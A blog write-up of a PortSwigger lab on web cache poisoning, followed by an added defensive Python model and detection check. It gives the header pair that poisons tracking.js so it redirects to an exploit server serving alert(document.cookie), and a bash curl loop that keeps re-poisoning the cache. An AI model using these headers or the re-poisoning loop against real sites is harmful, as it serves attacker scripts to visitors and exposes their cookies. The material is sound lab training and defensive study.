PortSwigger Lab: Web cache poisoning with multiple headers

Jun Takemura · March 6, 2025

Task

This lab contains a web cache poisoning vulnerability that is only exploitable when you use multiple headers to craft a malicious request. A user visits the home page roughly once a minute. To solve this lab, poison the cache with a response that executes alert(document.cookie) in the visitor’s browser.

Attempt

I added the headers below to the request for /resources/js/tracking.js and sent it:

X-Forwarded-Host: example.com
X-Forwarded-Scheme: http

With these headers the response redirected to example.com, indicating the cache poisoning vulnerability.

On the exploit server, host a JS file with the same name and path, /resources/js/tracking.js, and set the payload:

alert(document.cookie)

Set X-Forwarded-Host: exploit-EXPLOIT_ID.exploit-server.net so that the redirect points to the exploit server. When testing cache poisoning, add a cache buster like /resources/js/tracking.js?cp=dakfejlsjtesojad so the test doesn’t affect the live website. The value of the parameter should be random so that normal users don’t easily stumble on it.

To solve this lab, after confirming cache poisoning works, you need to poison the cache for the actual website by removing the cache buster.
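Seen from the defender's side, the behaviour above can be modelled offline. This is an added example, not code from the lab or from this post: it assumes a cache keyed on the path only, an origin that redirects as described above, and the made-up hosts shop.example and attacker.example, and it shows a check for off-site cached redirects plus the effect of stripping the forwarding headers at the edge.

```python
# Constructed model of the behaviour described in the post; all names are hypothetical.
from urllib.parse import urlsplit

FORWARDING_HEADERS = ("x-forwarded-host", "x-forwarded-scheme")
SITE_HOST = "shop.example"  # assumed canonical host of the site


def origin(path, headers):
    """Origin model: a non-https X-Forwarded-Scheme triggers a redirect
    whose host is taken from X-Forwarded-Host (both headers are needed)."""
    h = {k.lower(): v for k, v in headers.items()}
    if h.get("x-forwarded-scheme", "https") != "https":
        host = h.get("x-forwarded-host", SITE_HOST)
        return 302, f"https://{host}{path}"
    return 200, None


class Cache:
    """Cache keyed on the path only, so the forwarding headers are unkeyed."""

    def __init__(self, strip_client_headers=False):
        self.store = {}
        self.strip = strip_client_headers

    def fetch(self, path, headers=None):
        headers = dict(headers or {})
        if self.strip:
            # Hardening: drop client-supplied forwarding headers at the edge
            # so they cannot influence a response that gets cached.
            headers = {k: v for k, v in headers.items()
                       if k.lower() not in FORWARDING_HEADERS}
        if path not in self.store:
            self.store[path] = origin(path, headers)
        return self.store[path]


def redirect_is_off_site(response):
    """Detection check: a cached redirect must stay on the site's own host."""
    status, location = response
    return status in (301, 302) and urlsplit(location).hostname != SITE_HOST


def visitor_response(cache, path="/resources/js/tracking.js"):
    """One request carrying both headers, then a plain visitor request."""
    crafted = {"X-Forwarded-Host": "attacker.example",
               "X-Forwarded-Scheme": "http"}
    cache.fetch(path, crafted)
    return cache.fetch(path)
```

The same off-site check can be run against real cache entries or access logs by flagging any cacheable 3xx response whose Location host is not the site's own.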

Automatic cache re-poisoning

Some people say cache poisoning isn’t really critical because it only works for a short amount of time. But automatically re-poisoning the cache is easy as pie, and you don’t need to send a huge amount of traffic.

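#!/bin/bash

url="https://ID.web-security-academy.net/resources/js/tracking.js"
# Headers go in an array so each -H value reaches curl as a single argument;
# a plain string with embedded quotes would be split on every space.
headers=(
  -H "X-Forwarded-Host: exploit-EXPLOIT_ID.exploit-server.net"
  -H "X-Forwarded-Scheme: nothttps"
)

while true; do
  curl -s "$url" "${headers[@]}" > /dev/null
  sleep 2
done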

This simple bash script keeps re-poisoning the cache indefinitely.
